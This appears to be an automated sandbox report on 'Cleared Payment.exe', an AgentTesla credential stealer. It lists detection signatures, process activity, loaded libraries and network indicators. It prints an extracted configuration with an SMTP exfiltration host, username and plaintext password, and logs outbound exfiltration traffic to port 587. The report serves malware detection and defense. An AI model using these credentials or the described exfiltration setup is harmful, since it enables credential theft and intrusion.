
Windows Analysis Report
Cleared Payment.exe

Overview

General Information

Sample name: Cleared Payment.exe
Analysis ID: 1427197
MD5: 0df9817e2867f94e6bf0c066f9d88013
SHA1: 9b45f5c8cf5402b8cd56b58df316ca84b633f5c2
SHA256: ff70339ef950407a12f181c63d5b3d59fe40198237d97ce3c6537403c7863624
Tags: AgentTesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Cleared Payment.exe (PID: 5140 cmdline: "C:\Users\user\Desktop\Cleared Payment.exe" MD5: 0DF9817E2867F94E6BF0C066F9D88013)
    • Cleared Payment.exe (PID: 1524 cmdline: "C:\Users\user\Desktop\Cleared Payment.exe" MD5: 0DF9817E2867F94E6BF0C066F9D88013)
    • Cleared Payment.exe (PID: 2548 cmdline: "C:\Users\user\Desktop\Cleared Payment.exe" MD5: 0DF9817E2867F94E6BF0C066F9D88013)
  • cleanup
Malware family (Name / Description / Attribution / Link)

Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Extracted malware configuration:
{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.italiacanda-it.com", "Username": "snpss@italiacanda-it.com", "Password": "dsrociz1               "}
Yara matches in network traffic (Source | Rule | Description | Author)
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Yara matches in process memory dumps (Source | Rule | Description | Author)
00000004.00000002.3325617856.0000000002E04000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000004.00000002.3325617856.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000004.00000002.3323797943.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(11 entries in total; only the first 5 are reproduced here)

Yara matches in unpacked PE files (Source | Rule | Description | Author | Strings)
0.2.Cleared Payment.exe.41d12a0.12.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.Cleared Payment.exe.41d12a0.12.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.Cleared Payment.exe.41d12a0.12.raw.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x334e9:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3355b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x335e5:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x33677:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x336e1:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x33753:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x337e9:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x33879:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.Cleared Payment.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
4.2.Cleared Payment.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(11 entries in total; only the first 5 are reproduced here)

System Summary

Sigma detected: Suspicious Outbound SMTP Connections
Source: Network Connection
Author: frack113
Data: DestinationIp: 208.91.199.223, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Cleared Payment.exe, Initiated: true, ProcessId: 2548, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49714

Snort IDS alert for network traffic
Timestamp: 04/17/24-08:35:59.697606
SID: 2030171
Source Port: 49714
Destination Port: 587
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: Cleared Payment.exe | Avira: detected
Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.italiacanda-it.com", "Username": "snpss@italiacanda-it.com", "Password": "dsrociz1 "}
Source: Cleared Payment.exe | ReversingLabs: Detection: 73%
Source: Cleared Payment.exe | Virustotal: Detection: 61%
Source: Cleared Payment.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: Cleared Payment.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49714 -> 208.91.199.223:587
Source: Yara match | File source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.6:49714 -> 208.91.199.223:587
Source: Joe Sandbox View | IP Address: 208.91.199.223
Source: Joe Sandbox View | IP Address: 104.26.13.205
Source: Joe Sandbox View | IP Address: 104.26.13.205
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: api.ipify.org
Source: global traffic | TCP traffic: 192.168.2.6:49714 -> 208.91.199.223:587
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: api.ipify.org
Source: Cleared Payment.exe, 00000004.00000002.3325617856.0000000002D81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Cleared Payment.exe, 00000004.00000002.3325617856.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://smtp.italiacanda-it.com
Source: Cleared Payment.exe, 00000004.00000002.3325617856.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: Cleared Payment.exe, 00000000.00000002.2110434279.0000000003832000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000000.00000002.2110434279.000000000374E000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000004.00000002.3323797943.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: Cleared Payment.exe, 00000000.00000002.2110434279.0000000003832000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000000.00000002.2110434279.000000000374E000.00000004.00000800.00020000.00000000.sdmp, Cleared Payment.exe, 00000004.00000002.3323797943.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Cleared Payment.exe, 00000004.00000002.3325617856.0000000002D81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: Cleared Payment.exe, 00000004.00000002.3325617856.0000000002D81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: Cleared Payment.exe, 00000004.00000002.3325617856.0000000002D81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/t
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49712 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, K6raBsUk6.cs | .Net Code: _1kx

System Summary

Source: 0.2.Cleared Payment.exe.41d12a0.12.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.Cleared Payment.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Cleared Payment.exe.41d12a0.12.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Cleared Payment.exe.3832698.11.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Cleared Payment.exe.25aad94.1.raw.unpack, SQL.cs | Large array initialization: array initializer size 13797
Source: initial sample | Static PE information: Filename: Cleared Payment.exe
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 0_2_025376F8
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 0_2_02537708
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 0_2_04B60288
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 0_2_08609340
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 0_2_08600E48
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 0_2_0860DDA8
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 0_2_0860DD97
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 0_2_08600E38
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 4_2_02BCE5C1
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 4_2_02BC4A98
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 4_2_02BC3E80
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 4_2_02BC41C8
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 4_2_02BCA960
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 4_2_06BAA178
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 4_2_06BABA00
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 4_2_06BB55A8
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 4_2_06BB65E8
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 4_2_06BBB220
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 4_2_06BB3060
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 4_2_06BBC170
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 4_2_06BB7D78
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 4_2_06BB7698
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 4_2_06BBE388
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 4_2_06BB0040
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 4_2_06BB5CDB
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 4_2_06BB02F7
Source: C:\Users\user\Desktop\Cleared Payment.exe | Code function: 4_2_06BB0006
Source: Cleared Payment.exe | Binary or memory string: OriginalFilename vs Cleared Payment.exe
Source: Cleared Payment.exe, 00000000.00000000.2072850317.00000000002D2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameBoed.exe" vs Cleared Payment.exe
Source: Cleared Payment.exe, 00000000.00000002.2115085460.0000000008930000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Cleared Payment.exe
Source: Cleared Payment.exe, 00000000.00000002.2110434279.0000000003832000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamed1d0086e-f958-473c-b56d-1a9de9dc0359.exe4 vs Cleared Payment.exe
Source: Cleared Payment.exe, 00000000.00000002.2110434279.0000000003832000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Cleared Payment.exe
Source: Cleared Payment.exe, 00000000.00000002.2113867283.0000000006BF0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs Cleared Payment.exe
Source: Cleared Payment.exe, 00000000.00000002.2107163245.000000000275E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameriched20.dllp( vs Cleared Payment.exe
Source: Cleared Payment.exe, 00000000.00000002.2107163245.000000000275E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs Cleared Payment.exe
Source: Cleared Payment.exe, 00000000.00000002.2107163245.000000000275E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q,\\StringFileInfo\\000004B0\\OriginalFilename vs Cleared Payment.exe
Source: Cleared Payment.exe, 00000000.00000002.2107163245.0000000002571000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs Cleared Payment.exe
Source: Cleared Payment.exe, 00000000.00000002.2107163245.0000000002571000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs Cleared Payment.exe
Source: Cleared Payment.exe, 00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamed1d0086e-f958-473c-b56d-1a9de9dc0359.exe4 vs Cleared Payment.exe
Source: Cleared Payment.exe, 00000000.00000002.2107163245.0000000002627000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamed1d0086e-f958-473c-b56d-1a9de9dc0359.exe4 vs Cleared Payment.exe
Source: Cleared Payment.exe, 00000000.00000002.2106490417.00000000008FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Cleared Payment.exe
Source: Cleared Payment.exe, 00000004.00000002.3324069341.0000000000F58000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Cleared Payment.exe
Source: Cleared Payment.exe, 00000004.00000002.3323797943.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamed1d0086e-f958-473c-b56d-1a9de9dc0359.exe4 vs Cleared Payment.exe
Source: Cleared Payment.exe | Binary or memory string: OriginalFilenameBoed.exe" vs Cleared Payment.exe
Source: Cleared Payment.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.Cleared Payment.exe.41d12a0.12.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.Cleared Payment.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Cleared Payment.exe.41d12a0.12.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Cleared Payment.exe.3832698.11.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: Cleared Payment.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, c2bZQnG.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, c2bZQnG.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, Q1L0K.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, Q1L0K.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, uo1UBaEHa.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, uo1UBaEHa.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, uo1UBaEHa.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Cleared Payment.exe.3832698.11.raw.unpack, uo1UBaEHa.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, sc771bRe0eO1bpWvGt.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, yDRZvlxv5scWOQt6gJ.cs | Security API names: _0020.SetAccessControl
Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, yDRZvlxv5scWOQt6gJ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, yDRZvlxv5scWOQt6gJ.cs | Security API names: _0020.AddAccessRule
Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, sc771bRe0eO1bpWvGt.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Cleared Payment.exe.8930000.16.raw.unpack, sc771bRe0eO1bpWvGt.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, yDRZvlxv5scWOQt6gJ.cs | Security API names: _0020.SetAccessControl
Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, yDRZvlxv5scWOQt6gJ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Cleared Payment.exe.38d8e40.9.raw.unpack, yDRZvlxv5scWOQt6gJ.cs | Security API names: _0020.AddAccessRule
Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, yDRZvlxv5scWOQt6gJ.cs | Security API names: _0020.SetAccessControl
Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, yDRZvlxv5scWOQt6gJ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Cleared Payment.exe.3955060.10.raw.unpack, yDRZvlxv5scWOQt6gJ.cs | Security API names: _0020.AddAccessRule
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@5/1@2/2
                      Source: C:\Users\user\Desktop\Cleared Payment.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Cleared Payment.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeMutant created: NULL
                      Source: C:\Users\user\Desktop\Cleared Payment.exeMutant created: \Sessions\1\BaseNamedObjects\XtwtjCiO
                      Source: Cleared Payment.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Cleared Payment.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\Cleared Payment.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Cleared Payment.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Cleared Payment.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Cleared Payment.exeReversingLabs: Detection: 73%
                      Source: Cleared Payment.exeVirustotal: Detection: 61%
                      Source: C:\Users\user\Desktop\Cleared Payment.exeFile read: C:\Users\user\Desktop\Cleared Payment.exe:Zone.IdentifierJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Cleared Payment.exe "C:\Users\user\Desktop\Cleared Payment.exe"
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess created: C:\Users\user\Desktop\Cleared Payment.exe "C:\Users\user\Desktop\Cleared Payment.exe"
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess created: C:\Users\user\Desktop\Cleared Payment.exe "C:\Users\user\Desktop\Cleared Payment.exe"
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess created: C:\Users\user\Desktop\Cleared Payment.exe "C:\Users\user\Desktop\Cleared Payment.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeProcess created: C:\Users\user\Desktop\Cleared Payment.exe "C:\Users\user\Desktop\Cleared Payment.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: riched20.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: wbemcomn.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: amsi.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: rasapi32.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: rasman.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: rtutils.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: winhttp.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: dhcpcsvc.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: dnsapi.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: winnsi.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: secur32.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: schannel.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: mskeyprotect.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: ntasn1.dll
                      Source: C:\Users\user\Desktop\Cleared Payment.exe Section loaded: ncrypt.dll
